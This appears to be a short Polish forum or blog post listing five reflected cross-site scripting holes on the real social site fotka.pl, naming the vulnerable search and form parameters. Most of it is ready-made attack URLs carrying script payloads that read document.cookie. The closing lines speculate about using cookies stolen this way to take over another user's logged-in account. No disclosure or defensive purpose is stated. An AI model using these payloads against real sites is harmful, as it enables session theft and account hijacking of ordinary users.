Pierwszy :
Kod:
www.fotka.pl/szukaj zmienna miejscowosc="><h1><script>alert(document.cookie)</script></h1>
Drugi :
Kod:
www.fotka.pl/szukaj login&login="><h1><script>alert(document.cookie)</script></h1>
Trzeci :
Kod:
http://nowa.fotka.pl/szukaj#r &miejscowosc_id=
Czwarty bez kombinowania w POST myślałem na początku że google ma xss,a ale to wina po stronie fotki
Kod:
http://www.fotka.pl/szukaj_google.php?q=test&sa=Szukaj&sitesearch=%22%3E%3Ch1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C/h1%3E%2Fforum%2Fmoje_dyskusje&client=pub-2386558369721555&forid=1&channel=0970824739&ie=UTF-8&oe=UTF-8&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23FFFFFF%3BVLC%3A663399%3BAH%3Acenter %3BBGC%3AFFFFFF%3BLBGC%3AFFFFFF%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT %3A0000FF%3BGIMP%3A0000FF%3BFORID%3A11&hl=pl [/img]
Piaty :
[code] http://www.fotka.pl/klubgwiazd/mt zmienne phone_1= ,phone_2= ,phone_3= i f_telefon= są podatne na XSS
to chyba na tyle o ile nie pominąłem jakichś zmiennych podatnych na XSS.
% jeszcze to ale nie wiem czy będzie można to przekierować na konto po zmienieniu w zmiennych na osobę którą chcemy się zalogować + dodania coockies wykradzionych z XSS ale nie jestem pewien
Błędy można wykorzystać/uzyskać dopiero po zalogowaniu. Pozdrawiam
0 komentarze:
Prześlij komentarz